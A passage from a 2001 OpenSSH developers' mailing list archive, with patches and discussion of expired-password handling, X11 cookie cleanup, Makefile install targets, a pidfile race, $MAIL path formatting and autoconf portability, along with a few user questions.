dwd at bell-labs.com (Dave Dykstra) Date: Thu, 21 Jun 2001 13:08:07 -0500 Subject: Patch for changing expired passwords In-Reply-To: <20010619082309.A17644@lucent.com>; from dwd@bell-labs.com on Tue, Jun 19, 2001 at 08:23:09AM -0500 References: <20010618155545.A5924@lucent.com> <20010619143046.A22082@folly> <20010619082309.A17644@lucent.com> Message-ID: <20010621130806.A26314@lucent.com> Markus has now installed a variation on my changes to session.c into openbsd openssh CVS, and Ben has pulled in the session.c changes into the portable openssh CVS, so here is an update of my patch based on the current portable openssh CVS. Markus decided to defer the additional logging I suggested in auth.c, so I left that out. Note: I pointed out to Markus in private email that the line "forced_command = NULL" should not be there in do_exec(), and it is unfortunately in the context of the following diff so if that change gets applied first this might not apply cleanly anymore. - Dave Dykstra --- auth.c.O Mon Jun 18 14:19:54 2001 +++ auth.c Thu Jun 21 11:22:34 2001 @@ -47,6 +47,9 @@ #include "buffer.h" #include "bufaux.h" +/* set when password has expired */ +int forced_passwd_change = 0; + /* import */ extern ServerOptions options; @@ -86,8 +89,12 @@ /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && - (days > (spw->sp_lstchg + spw->sp_max))) - return 0; + (days > (spw->sp_lstchg + spw->sp_max))) { + if ((pw->pw_uid == 0)) + return 0; + + forced_passwd_change = 1; + } } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ --- auth.h.O Tue Jun 5 15:25:06 2001 +++ auth.h Mon Jun 18 14:28:04 2001 @@ -35,6 +35,9 @@ #include #endif +/* set when password has expired */ +extern int forced_passwd_change; + typedef struct Authctxt Authctxt; typedef struct KbdintDevice KbdintDevice; --- session.c.O Thu Jun 21 11:09:30 2001 +++ session.c Thu Jun 21 11:16:42 2001 @@ -596,7 +596,31 @@ void do_exec(Session *s, const char *command) { - if (forced_command) { + if (forced_passwd_change) { + char *user = s->pw->pw_name; + char *msg; + + if (s->ttyfd != -1) { + msg = "Password for %.100s has expired, running 'passwd' to reset it"; + /* + * Can't pass "user" to 'passwd' because Linux doesn't + * allow it. + * Also, the prompt is friendlier without "user". + */ + command = PASSWD_PATH; + } else { + msg = "Password for %.100s has expired and cannot be changed without a pty"; + /* + * Without a pty, Solaris 'passwd' prints "Permission + * denied", but Linux attempts to change the password + * and fails miserably, so echo an error message instead + */ + command = "/bin/sh -c 'echo Permission denied >&2; exit 1'"; + } + log(msg, user); + packet_send_debug(msg, user); + + } else if (forced_command) { original_command = command; command = forced_command; forced_command = NULL; --- configure.in.O Sun Jun 10 12:24:52 2001 +++ configure.in Mon Jun 18 14:27:23 2001 @@ -1304,6 +1304,10 @@ AC_DEFINE_UNQUOTED(RSH_PATH, "$rsh_path") fi +AC_PATH_PROG(PASSWD_PATH, passwd) +AC_DEFINE_UNQUOTED(PASSWD_PATH, "$PASSWD_PATH") + + # Check for mail directory (last resort if we cannot get it from headers) if test ! -z "$MAIL" ; then maildir=`dirname $MAIL` --- acconfig.h.O Tue May 8 15:33:06 2001 +++ acconfig.h Mon Jun 18 14:30:16 2001 @@ -211,6 +211,9 @@ /* Define if rsh is found in your path */ #undef RSH_PATH +/* Define if passwd is found in your path */ +#undef PASSWD_PATH + /* Define if you want to allow MD5 passwords */ #undef HAVE_MD5_PASSWORDS From rjmooney at aboveground.cx Fri Jun 22 04:41:00 2001 From: rjmooney at aboveground.cx (Robert Mooney) Date: Thu, 21 Jun 2001 14:41:00 -0400 Subject: SFTP Logging Redux. In-Reply-To: <20010621105946.D21713@dour.org> Message-ID: : A) SSHD always logs. Default level is AUTH.INFO unless otherwise : specified. Since SSHD always logs, I see no reason why its : subsystems shouldn't automatically log as well. You're right. It's always nice to be able to turn stuff off, tho. : B) I'm not certain how useful part B would be. Are you saying you : still want it logged but you want to alter the log-string based on a : verbosity setting (terse versus verbose)? Or do you want the : LOGLEVEL of the logging to be user-defined? I meant verbosity, but probably doesn't mean much in this case, since you're not doing a whole lot of logging. : Agreed. However, as I stated above, this puts SFTP loggin in line : with SSHD logging. I don't see why we should turn it off by : default, much less HOW given that use of the log() function requires : logging to be active. I kind of forgot that adding arguments to sftp-server would complicate matters more than necessary, so in this case, I agree that it should just be left on. I think there was only one instance that was still logging the old way. I haven't tested it, but it looks much better than the last version. - Rob From jason at dour.org Fri Jun 22 05:00:38 2001 From: jason at dour.org (Jason A . Dour) Date: Thu, 21 Jun 2001 15:00:38 -0400 Subject: SFTP Logging Redux. In-Reply-To: ; from rjmooney@aboveground.cx on Thu, Jun 21, 2001 at 02:41:00PM -0400 References: <20010621105946.D21713@dour.org> Message-ID: <20010621150038.A22358@dour.org> On Thu, Jun 21, 2001 at 02:41:00PM -0400, Robert Mooney wrote: > I kind of forgot that adding arguments to sftp-server would complicate > matters more than necessary, so in this case, I agree that it should > just be left on. Yeah. There's some stuff I'd like to see for SFTP that might necessitate this, however. chroot() being one (unless there's a plan to offer chroot() for sshd as a whole). If I have to add getopt handling for other reasons, adding one for logging levels would be simple. > I think there was only one instance that was still logging the old > way. I haven't tested it, but it looks much better than the last > version. There is one line that needs fixing in that last patch. Line 1147 of the patched code should look like: cuname = xstrdup(upw->pw_name); instead of: cuname = upw->pw_name; because the pw entry apparently gets borked temporarily by functions such as chmod(), chown(), et cetera, leading to invalid usernames in log entries. Duping the string keeps it constant as it should be. It seems to test clean. I've not experienced any trouble with it so far. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ From Christopher.Askew at motorola.com Fri Jun 22 05:05:46 2001 From: Christopher.Askew at motorola.com (Askew Christopher-LCA007) Date: Thu, 21 Jun 2001 15:05:46 -0400 Subject: SSH RFC Message-ID: <7BF8519B199FD411A3D400D0B76FE77401B89222@ma07exm02.corp.isg.mot.com> Greetings, Just wondering if there is an RFC describing the secure shell protocols? Thanks, Chris From Darren.Moffat at eng.sun.com Fri Jun 22 05:08:15 2001 From: Darren.Moffat at eng.sun.com (Darren Moffat) Date: Thu, 21 Jun 2001 12:08:15 -0700 (PDT) Subject: SSH RFC Message-ID: <200106211908.f5LJ8xG242272@jurassic.eng.sun.com> >Greetings, > Just wondering if there is an RFC describing the secure shell protocols? A work in progress - it will be more than one RFC though, for more info see the IETF SECSH working group page: http://ietf.org/html.charters/secsh-charter.html -- Darren J Moffat From Alok.Aggarwal at Sun.COM Fri Jun 22 05:41:56 2001 From: Alok.Aggarwal at Sun.COM (Alok Aggarwal) Date: Thu, 21 Jun 2001 12:41:56 -0700 (PDT) Subject: Patch for removing X11 fwding cookies Message-ID: Currently, openssh-2.9p2 adds cookies to a user's .Xauthority file if X11 forwarding is requested but does not delete them while closing down the connection. While this may not necessarily be a security vulnerability, but it's a good idea for the application to cleanup appropriately. This patch takes care of removing the X forwarding cookies from the user's .Xauthority file. Please consider integrating this into the OpenSSH code. Thanks. -Alok diff -w -c openssh-2.9p2/session.c modified/session.c *** 1950,1955 **** --- 1565,1590 ---- void session_close(Session *s) { + char cmd[1024]; + FILE *f = NULL; + int xauth_present = s->auth_proto != NULL && s->auth_data != NULL; + + memset(cmd, 0, sizeof (cmd)); + + if (xauth_present && options.xauth_location != NULL) { + debug("Running %.100s remove %.100s", + options.xauth_location, s->display); + temporarily_use_uid(s->pw->pw_uid); + snprintf(cmd, sizeof (cmd), "%s -q -", + options.xauth_location); + f = popen(cmd, "w"); + if (f) { + fprintf(f, "remove %s\n", s->display); + pclose(f); + } else { + fprintf(stderr, "Could not run %s\n", cmd); + } + restore_uid(); + } session_pty_cleanup(s); session_free(s); session_proctitle(s); *************** From stevesk at pobox.com Fri Jun 22 06:19:19 2001 From: stevesk at pobox.com (Kevin Steves) Date: Thu, 21 Jun 2001 13:19:19 -0700 (PDT) Subject: pw_expire/pw_change in current portable openssh CVS bombs In-Reply-To: <20010621115112.A25121@lucent.com> Message-ID: On Thu, 21 Jun 2001, Dave Dykstra wrote: :The references to pw_expire and pw_change in pwcopy() in misc.c cause :compilation errors at least on solaris. How about doing a memcpy of the :whole structure and only explicitly setting those that need xstrdup? :That would work on openbsd and everywhere else. that will work until they are referenced, at which point we'll still need to have configure define HAVE_FOO and use that around the reference. From ckraemer at ginko.de Fri Jun 22 05:59:47 2001 From: ckraemer at ginko.de (Christian Kraemer) Date: Thu, 21 Jun 2001 21:59:47 +0200 Subject: pam session in linux port Message-ID: <01062122261501.00259@christian.localdomain> Hi, Does anybody know why openssh (openssh-2.9p1) on a linux system does not call pam_open_session if no pty is used? In this way the session modules (in /etc/pam.d) are not activated. This is especially annoying if you use pam_limits.so to set rlimits. Every user could circumvent them easily. I do not know if this issue has been discussed before and if this behavior is not alright ..... cu Christian From Greg.Scheidel at ed.gov Fri Jun 22 13:11:11 2001 From: Greg.Scheidel at ed.gov (Scheidel, Greg (Contractor)) Date: Thu, 21 Jun 2001 23:11:11 -0400 Subject: SSH RFC Message-ID: <2E3AC3356942D511B8A30008C7AAAC08531CF5@wdcrobexc10.ed.gov> Hopefully not to continue an off-topic e-mail too much... I've seen reference on the list to an 'SSH book'. What exactly is being referred to? Greg S. -----Original Message----- From: Darren Moffat [mailto:Darren.Moffat at eng.sun.com] Sent: Thursday, June 21, 2001 3:08 PM To: Christopher.Askew at motorola.com Cc: openssh-unix-dev at mindrot.org Subject: Re: SSH RFC >Greetings, > Just wondering if there is an RFC describing the secure shell protocols? A work in progress - it will be more than one RFC though, for more info see the IETF SECSH working group page: http://ietf.org/html.charters/secsh-charter.html -- Darren J Moffat -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010621/2140ccba/attachment.html From djm at mindrot.org Fri Jun 22 13:23:09 2001 From: djm at mindrot.org (Damien Miller) Date: Fri, 22 Jun 2001 13:23:09 +1000 (EST) Subject: SSH RFC In-Reply-To: <2E3AC3356942D511B8A30008C7AAAC08531CF5@wdcrobexc10.ed.gov> Message-ID: On Thu, 21 Jun 2001, Scheidel, Greg (Contractor) wrote: > Hopefully not to continue an off-topic e-mail too much... I've seen > reference on the list to an 'SSH book'. What exactly is being referred to? SSH, The Secure Shell: The Definitive Guide By Daniel J. Barrett & Richard Silverman http://www.oreilly.com/catalog/sshtdg/ -d -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From abartlet at pcug.org.au Fri Jun 22 21:13:51 2001 From: abartlet at pcug.org.au (Andrew Bartlett) Date: Fri, 22 Jun 2001 21:13:51 +1000 Subject: pam session in linux port References: <01062122261501.00259@christian.localdomain> Message-ID: <3B33286F.91DCDFF9@bartlett.house> Christian Kraemer wrote: > > Hi, > > Does anybody know why openssh (openssh-2.9p1) on a linux system does not call > pam_open_session if no pty is used? In this way the session modules (in > /etc/pam.d) are not activated. > > This is especially annoying if you > use pam_limits.so to set rlimits. Every user could > circumvent them easily. > > I do not know if this issue has been discussed before and if this behavior is > not alright ..... > > cu Christian I posted a patch to correct this behaviour, but it seems to have been ignored (I've certainly not heard back about it). Andrew Bartlett -- Andrew Bartlett abartlet at pcug.org.au abartlet at samba.org From jason at dour.org Sat Jun 23 00:02:08 2001 From: jason at dour.org (Jason A . Dour) Date: Fri, 22 Jun 2001 10:02:08 -0400 Subject: PATCH: Makefile.in more upgrade friendly. Message-ID: <20010622100208.A23601@dour.org> Hello again, In my constant recompiles of 2.9p1 and 2.9p2, I've noticed that upgrading a current installation with a test compile leads to tons of files being updated even when they don't need to be. The attached patch for Makefile.in splits the install-files target into a bunch of serparate targets: install-dirs, install-prog, install-man, install-conf, which are then all called in their prior order from install target. This allows a person who is testing new binaries several times an hour to only update the necessary files, say... make install-bin rather than the more broad make install-files Not a big issue. Not really a problem. Just finer-grained install control. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ -------------- next part -------------- --- Makefile.in.orig Fri Jun 22 09:53:07 2001 +++ Makefile.in Fri Jun 22 09:56:17 2001 @@ -164,15 +164,17 @@ distprep: catman-do autoreconf -install: $(TARGETS) install-files host-key +install: $(TARGETS) install-dirs install-prog install-man install-conf host-key -install-files: +install-dirs: $(srcdir)/mkinstalldirs $(DESTDIR)$(bindir) $(srcdir)/mkinstalldirs $(DESTDIR)$(sbindir) $(srcdir)/mkinstalldirs $(DESTDIR)$(mandir) $(srcdir)/mkinstalldirs $(DESTDIR)$(mandir)/$(mansubdir)1 $(srcdir)/mkinstalldirs $(DESTDIR)$(mandir)/$(mansubdir)8 $(srcdir)/mkinstalldirs $(DESTDIR)$(libexecdir) + +install-prog: $(INSTALL) -m $(SSH_MODE) -s ssh $(DESTDIR)$(bindir)/ssh $(INSTALL) -m 0755 -s scp $(DESTDIR)$(bindir)/scp $(INSTALL) -m 0755 -s ssh-add $(DESTDIR)$(bindir)/ssh-add @@ -182,6 +184,11 @@ $(INSTALL) -m 0755 -s sshd $(DESTDIR)$(sbindir)/sshd @NO_SFTP@$(INSTALL) -m 0755 -s sftp $(DESTDIR)$(bindir)/sftp @NO_SFTP@$(INSTALL) -m 0755 -s sftp-server $(DESTDIR)$(SFTP_SERVER) + -rm -f $(DESTDIR)$(bindir)/slogin + ln -s ssh$(EXEEXT) $(DESTDIR)$(bindir)/slogin + @FILEPRIV@ -f dev,filesys,driver $(DESTDIR)$(bindir)/ssh $(DESTDIR)$(bindir)/slogin + +install-man: $(INSTALL) -m 644 ssh.1.out $(DESTDIR)$(mandir)/$(mansubdir)1/ssh.1 $(INSTALL) -m 644 scp.1.out $(DESTDIR)$(mandir)/$(mansubdir)1/scp.1 $(INSTALL) -m 644 ssh-add.1.out $(DESTDIR)$(mandir)/$(mansubdir)1/ssh-add.1 @@ -191,11 +198,10 @@ $(INSTALL) -m 644 sshd.8.out $(DESTDIR)$(mandir)/$(mansubdir)8/sshd.8 @NO_SFTP@$(INSTALL) -m 644 sftp.1.out $(DESTDIR)$(mandir)/$(mansubdir)1/sftp.1 @NO_SFTP@$(INSTALL) -m 644 sftp-server.8.out $(DESTDIR)$(mandir)/$(mansubdir)8/sftp-server.8 - -rm -f $(DESTDIR)$(bindir)/slogin - ln -s ssh$(EXEEXT) $(DESTDIR)$(bindir)/slogin -rm -f $(DESTDIR)$(mandir)/$(mansubdir)1/slogin.1 ln -s ssh.1 $(DESTDIR)$(mandir)/$(mansubdir)1/slogin.1 - @FILEPRIV@ -f dev,filesys,driver $(DESTDIR)$(bindir)/ssh $(DESTDIR)$(bindir)/slogin + +install-conf: if [ ! -d $(DESTDIR)$(sysconfdir) ]; then \ $(srcdir)/mkinstalldirs $(DESTDIR)$(sysconfdir); \ fi From djast at cs.toronto.edu Fri Jun 22 05:16:35 2001 From: djast at cs.toronto.edu (Dan Astoorian) Date: Thu, 21 Jun 2001 15:16:35 -0400 Subject: Bug: OpenSSH (port.) daemon sets $MAIL incorrectly on Solaris (others?) Message-ID: <01Jun21.151638edt.453134-24698@jane.cs.toronto.edu> This bug may be specific to the portability releases of OpenSSH. It's minor, but trivially corrected. I'm observing it under: * openssh-2.3.0p1 (openssl-0.9.6) * compiled under Solaris 2.5.1 * running under Solaris 2.5.1 and Solaris 8 The relevant source code does not appear to have changed up to and including openssh-2.9p2. The bug is that the $MAIL environment variable set by the server contains an extraneous slash between the spool directory and the userid; i.e., "/var/mail//djast" instead of "/var/mail/djast" . Although this is usually harmless, since the pathname is still valid with the null pathname component, some of my users are reporting that the extra slash confuses rmail under emacs in such a way that it will not read the mailbox. The cause of the bug is that "defines.h" includes , and under Solaris (and possibly other platforms on which HAVE_MAILLOCK_H is defined), /usr/include/maillock.h defines MAILDIR in a manner which includes the trailing slash: #define MAILDIR "/var/mail/" ... #if !defined(_PATH_MAILDIR) && defined(MAILDIR) # define _PATH_MAILDIR MAILDIR #endif /* !defined(_PATH_MAILDIR) && defined(MAILDIR) */ In session.c, this definition gets used to set the MAIL environment variable: snprintf(buf, sizeof buf, "%.200s/%.50s", _PATH_MAILDIR, pw->pw_name); child_set_env(&env, &envsize, "MAIL", buf); This results in the doubled slash. I can recommend two alternatives to correct the problem. One trivial workaround for the bug is simply to test whether the last character of MAILDIR is a slash; e.g.: snprintf(buf, sizeof buf, "%.200s%.1s%.50s", _PATH_MAILDIR, (_PATH_MAILDIR[strlen(_PATH_MAILDIR)-1]=='/')?"":"/", pw->pw_name); child_set_env(&env, &envsize, "MAIL", buf); A different approach to the problem would be to modify the definitions so that the trailing slash is always present in the macro; for instance, by changing "defines.h" to read: #ifndef MAIL_DIRECTORY # define MAIL_DIRECTORY "/var/spool/mail/" #endif #ifndef _PATH_MAILDIR # define _PATH_MAILDIR MAIL_DIRECTORY #endif #if !defined(MAILDIR) && defined(_PATH_MAILDIR) # define MAILDIR _PATH_MAILDIR "/" #endif /* !defined(MAILDIR) && defined(_PATH_MAILDIR) */ and changing the original snprintf() in session.c to user "MAILDIR" in place of "_PATH_MAILDIR," and removing the slash from the format string. Note, however, that the second proposed solution is riskier, in that it makes the (possibly unfounded) assumption that if MAILDIR is defined on a platform, it will always have a trailing slash, but that _PATH_MAILDIR never will; the first solution adapts to whatever is provided. Please let me know if you require further information. Thanks, -- Dan Astoorian People shouldn't think that it's better to have Sysadmin, CSLab loved and lost than never loved at all. It's djast at cs.toronto.edu not, it's better to have loved and won. All www.cs.toronto.edu/~djast/ the other options really suck. --Dan Redican From bbraun at synack.net Sat Jun 23 05:06:47 2001 From: bbraun at synack.net (Rob Braun) Date: Fri, 22 Jun 2001 13:06:47 -0600 Subject: PATCH: pidfile/sigterm race Message-ID: <200106221906.f5MJ6lN15996@gw.synack.net> If one is using the pidfile as an indicator of sshd's status, it is possible to kill sshd before the sigterm handler gets installed, since the pidfile is written out before the signal handlers are setup. The solution is to simply write the pidfile after the signal handlers are setup. Here's the patch. Rob --- sshd.c.orig Fri Jun 22 11:16:41 2001 +++ sshd.c Fri Jun 22 11:18:32 2001 @@ -857,6 +857,19 @@ if (!num_listen_socks) fatal("Cannot bind any address."); + if (options.protocol & SSH_PROTO_1) + generate_ephemeral_server_key(); + + /* Arrange to restart on SIGHUP. The handler needs listen_sock. */ + signal(SIGHUP, sighup_handler); + + signal(SIGTERM, sigterm_handler); + signal(SIGQUIT, sigterm_handler); + + /* Arrange SIGCHLD to be caught. */ + signal(SIGCHLD, main_sigchld_handler); + + /* Write out the pid file after the sigterm handler is setup */ if (!debug_flag) { /* * Record our pid in /var/run/sshd.pid to make it @@ -871,17 +884,6 @@ fclose(f); } } - if (options.protocol & SSH_PROTO_1) - generate_ephemeral_server_key(); - - /* Arrange to restart on SIGHUP. The handler needs listen_sock. */ - signal(SIGHUP, sighup_handler); - - signal(SIGTERM, sigterm_handler); - signal(SIGQUIT, sigterm_handler); - - /* Arrange SIGCHLD to be caught. */ - signal(SIGCHLD, main_sigchld_handler); /* setup fd set for listen */ fdset = NULL; From stevesk at pobox.com Sat Jun 23 06:06:05 2001 From: stevesk at pobox.com (Kevin Steves) Date: Fri, 22 Jun 2001 13:06:05 -0700 (PDT) Subject: 2.9p1 patches In-Reply-To: <20010520230944.A22638@postal.il.thewrittenword.com> Message-ID: thanks, is it possible to separate each change into an individual patch? On Sun, 20 May 2001 openssh-unix-dev at thewrittenword.com wrote: :1. Add support for files >2GB via Paul Eggert's AC_SYS_LARGEFILE : macro. This macro is now part of autoconf 2.50. Because of this, : "config.h" needs to be included before system headers to get : the appropriate defines for LFS support. : openbsd-compat/sigact.c : configure.in : acinclude.m4 :2. AIX defines TILDE in . Rename to TILDE_CHAR. Feel : free to pick a better name. : openbsd-compat/glob.c is ioctl.h needed in glob.c? i don't think so. what about just #undef'ing TILDE after includes.h or leave it and live with a redefinition warning? we try to minimize the diff with the openbsd tree. :3. You should *not* place custom macros in aclocal.m4. They should : be in acinclude.m4 and then you should use aclocal to generate : aclocal.m4 from acinclude.m4. : acinclude.m4 :4. A better --with-pcre and --with-zlib configure test. : configure.in : :Some comments regarding your code in configure.in: : 1. Hardcoding the need for -lsocket and -lnsl via : $no_libsocket and $no_libnslis gross. Doing this means you : don't know how to write a proper autoconf test to determine : if these two libraries are needed. The solution is not to : hack in the value with a case statement but to figure out : the proper autoconf way of solving the problem, independent : of the hardcoding the solution for every platform. A solution : proposed below is: : AC_CHECK_FUNC(yp_match, , AC_CHECK_LIB(nsl, yp_match)) : AC_CHECK_FUNC(setsockopt, , AC_CHECK_LIB(socket, setsockopt)) : We could probably also add: : AC_CHECK_FUNC(gethostent, , AC_CHECK_LIB(nsl, gethostent)) : 2. Checks such as the following are wrong: : AC_CHECK_LIB(gen, getspnam, LIBS="$LIBS -lgen") : Don't check if the function exists in the library. Check : first if the function exists *without* the library and then : with the library if need be (and, FYI, AC_CHECK_LIB(lib,func) : will automatically add "-l[lib]" to $LIBS): : AC_CHECK_FUNC(getspnam, , AC_CHECK_LIB(gen, getspnam)) good suggestions, can you provide patches for them? :If our autoconf checks aren't correct, let's find out why and fix it. :I'd like to move in a direction where there are *no* hardcoded case :statements per platform in configure.in. : :-- :albert chin (china at thewrittenword.com) From pete at more.net Sat Jun 23 06:03:27 2001 From: pete at more.net (pete at more.net) Date: Fri, 22 Jun 2001 15:03:27 -0500 Subject: rsa_private_decrypt() failed Message-ID: <20010622150327.E26652@more.net> Hello, I'm running several Sparcs with Solaris 2.7 on them. They all have Openssh 2.9 installed, and all work fine. Except one. Every once in a while I get this: "Disconnecting: Corrupted check bytes on input." When I truss or I am at the console I get this: "rsa_private_decrypt() failed" I've tried reinstalling with OpenSSH 2.5, 2.9 and the commercial versions. I get these errors from Linux and x86 Solaris boxes too in random intervals. It's just this one box. Obviously it seems like a lib is screwed up. All of my boxes are at the same patch level. I've also installed new OpenSSL and zlib's. I've seen different requests at the OpenSSH site's mailing list archives for a fix, and I haven't found any that work. I've generated several sets of keys, and replaced all the configs with one's known to work fine everywhere else. Any clues or suggestions would be greatly appreciated. Thanks, -- Pete Greenwell System Administrator Missouri Research and Education Network [MOREnet] http://www.more.net From openssh-unix-dev at thewrittenword.com Sat Jun 23 06:12:06 2001 From: openssh-unix-dev at thewrittenword.com (openssh-unix-dev at thewrittenword.com) Date: Fri, 22 Jun 2001 15:12:06 -0500 Subject: 2.9p1 patches In-Reply-To: ; from stevesk@pobox.com on Fri, Jun 22, 2001 at 01:06:05PM -0700 References: <20010520230944.A22638@postal.il.thewrittenword.com> Message-ID: <20010622151206.B11915@superman.il.thewrittenword.com> On Fri, Jun 22, 2001 at 01:06:05PM -0700, Kevin Steves wrote: > thanks, is it possible to separate each change into an individual patch? Sure. I'll do this when syncing up our patches against 2.9p2 this weekend. > On Sun, 20 May 2001 openssh-unix-dev at thewrittenword.com wrote: > :1. Add support for files >2GB via Paul Eggert's AC_SYS_LARGEFILE > : macro. This macro is now part of autoconf 2.50. Because of this, > : "config.h" needs to be included before system headers to get > : the appropriate defines for LFS support. > : openbsd-compat/sigact.c > : configure.in > : acinclude.m4 > :2. AIX defines TILDE in . Rename to TILDE_CHAR. Feel > : free to pick a better name. > : openbsd-compat/glob.c > > is ioctl.h needed in glob.c? i don't think so. what about just > #undef'ing TILDE after includes.h or leave it and live with a redefinition > warning? we try to minimize the diff with the openbsd tree. glob.c includes "includes.h" which includes . So how about fixing TILDE in the openbsd tree? I'll try without the patch on 2.9p2 and report results. > :3. You should *not* place custom macros in aclocal.m4. They should > : be in acinclude.m4 and then you should use aclocal to generate > : aclocal.m4 from acinclude.m4. > : acinclude.m4 I'm wrong about this. Because you don't use automake, what you're doing is perfectly OK. > :Some comments regarding your code in configure.in: > : 1. Hardcoding the need for -lsocket and -lnsl via > : $no_libsocket and $no_libnslis gross. Doing this means you > : don't know how to write a proper autoconf test to determine > : if these two libraries are needed. The solution is not to > : hack in the value with a case statement but to figure out > : the proper autoconf way of solving the problem, independent > : of the hardcoding the solution for every platform. A solution > : proposed below is: > : AC_CHECK_FUNC(yp_match, , AC_CHECK_LIB(nsl, yp_match)) > : AC_CHECK_FUNC(setsockopt, , AC_CHECK_LIB(socket, setsockopt)) > : We could probably also add: > : AC_CHECK_FUNC(gethostent, , AC_CHECK_LIB(nsl, gethostent)) > : 2. Checks such as the following are wrong: > : AC_CHECK_LIB(gen, getspnam, LIBS="$LIBS -lgen") > : Don't check if the function exists in the library. Check > : first if the function exists *without* the library and then > : with the library if need be (and, FYI, AC_CHECK_LIB(lib,func) > : will automatically add "-l[lib]" to $LIBS): > : AC_CHECK_FUNC(getspnam, , AC_CHECK_LIB(gen, getspnam)) > > good suggestions, can you provide patches for them? Ok. -- albert chin (china at thewrittenword.com) From ayamura at ayamura.org Sat Jun 23 06:40:36 2001 From: ayamura at ayamura.org (Ayamura KIKUCHI) Date: Sat, 23 Jun 2001 05:40:36 +0900 (JST) Subject: PATCH: pidfile/sigterm race Message-ID: <200106222040.f5MKeakZ011119@mail.ayamura.org> Some systems do not have pw_expire/pw_change fields in the passwd structure. openssh_cvs/misc.c: copy->pw_gecos = xstrdup(pw->pw_gecos); copy->pw_uid = pw->pw_uid; copy->pw_gid = pw->pw_gid; +#ifdef HAVE_PW_EXPIRE_IN_PASSWD copy->pw_expire = pw->pw_expire; +#endif +#ifdef HAVE_PW_CHANGE_IN_PASSWD copy->pw_change = pw->pw_change; +#endif #ifdef HAVE_PW_CLASS_IN_PASSWD copy->pw_class = xstrdup(pw->pw_class); #endif -- ayamura From stevesk at pobox.com Sat Jun 23 06:55:58 2001 From: stevesk at pobox.com (Kevin Steves) Date: Fri, 22 Jun 2001 13:55:58 -0700 (PDT) Subject: PATCH: pidfile/sigterm race In-Reply-To: <200106222040.f5MKeakZ011119@mail.ayamura.org> Message-ID: i'm addressing that just now. On Sat, 23 Jun 2001, Ayamura KIKUCHI wrote: :Some systems do not have pw_expire/pw_change fields in the passwd :structure. : :openssh_cvs/misc.c: : copy->pw_gecos = xstrdup(pw->pw_gecos); : copy->pw_uid = pw->pw_uid; : copy->pw_gid = pw->pw_gid; :+#ifdef HAVE_PW_EXPIRE_IN_PASSWD : copy->pw_expire = pw->pw_expire; :+#endif :+#ifdef HAVE_PW_CHANGE_IN_PASSWD : copy->pw_change = pw->pw_change; :+#endif : #ifdef HAVE_PW_CLASS_IN_PASSWD : copy->pw_class = xstrdup(pw->pw_class); : #endif From markus.friedl at informatik.uni-erlangen.de Sat Jun 23 08:03:06 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sat, 23 Jun 2001 00:03:06 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010621151214.A27941@ws01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Thu, Jun 21, 2001 at 03:12:15PM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> <20010621151214.A27941@ws01.aet.tu-cottbus.de> Message-ID: <20010623000306.A14300@folly> i get this on openbsd-current: Connection closed by remote host. debug1: channel_free: channel 0: server-session, nchannels 1 debug3: channel_free: status: The following connections are open: #0 server-session (t4 r0 i1/0 o16/0 fd 4/3) debug1: channel_free: channel 0: dettaching channel user debug1: session_by_channel: session 0 channel 0 debug1: session_close_by_channel: channel 0 kill 5870 debug1: Received SIGCHLD. debug3: channel_close_fds: channel 0: r 4 w 3 e -1 debug1: session_by_pid: pid 5870 debug1: session_close: session 0 pid 5870 debug1: session_pty_cleanup: session 0 release /dev/ttyqc Closing connection to 127.0.0.1 -m From info at ninosdepapel.org Sat Jun 23 07:56:13 2001 From: info at ninosdepapel.org (Niños de Papel) Date: Fri, 22 Jun 2001 16:56:13 -0500 Subject: Para disfrutar el Arte con un Proposito Message-ID: <200106221807171.SM00339@internet> ***** This is an HTML Message ! ***** -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010622/76b4c52d/attachment.html From vader at conflict.net Sat Jun 23 11:57:22 2001 From: vader at conflict.net (Jim Breton) Date: Sat, 23 Jun 2001 01:57:22 +0000 Subject: pam session In-Reply-To: <01061903113100.00225@christian.localdomain>; from ckraemer@ginko.de on Tue, Jun 19, 2001 at 03:11:02AM +0200 References: <01061903113100.00225@christian.localdomain> Message-ID: <20010623015722533062.16104@alongtheway.com> On Tue, Jun 19, 2001 at 03:11:02AM +0200, Christian Kraemer wrote: > This is espacially anoying if you > use pam_limits.so to set rlimits. Every user could > cirrcumvent them easily by calling ssh in this way: > ssh user at server /bin/sh Interestingly, Debian 2.2's openssh (1:1.2.3-9.3) does enforce rlimits somehow, not sure if it was specifically patched to do this or perhaps the older version just does not have this problem. Just an FYI, while messing with this I also notice that the SSH_CLIENT and SSH_TTY environment variables are not being set, and no authlog message is generated. (Neither of these problems exist in the Debian build.) From abartlet at pcug.org.au Sat Jun 23 22:04:17 2001 From: abartlet at pcug.org.au (Andrew Bartlett) Date: Sat, 23 Jun 2001 22:04:17 +1000 Subject: pam session References: <01061903113100.00225@christian.localdomain> <20010623015722533062.16104@alongtheway.com> Message-ID: <3B3485C1.873E4EE5@bartlett.house> Jim Breton wrote: > > On Tue, Jun 19, 2001 at 03:11:02AM +0200, Christian Kraemer wrote: > > This is espacially anoying if you > > use pam_limits.so to set rlimits. Every user could > > cirrcumvent them easily by calling ssh in this way: > > ssh user at server /bin/sh > > Interestingly, Debian 2.2's openssh (1:1.2.3-9.3) does enforce rlimits > somehow, not sure if it was specifically patched to do this or perhaps > the older version just does not have this problem. > > Just an FYI, while messing with this I also notice that the SSH_CLIENT > and SSH_TTY environment variables are not being set, and no authlog > message is generated. (Neither of these problems exist in the Debian > build.) Yep, there has been some major regregression in this area (IMHO) compared with 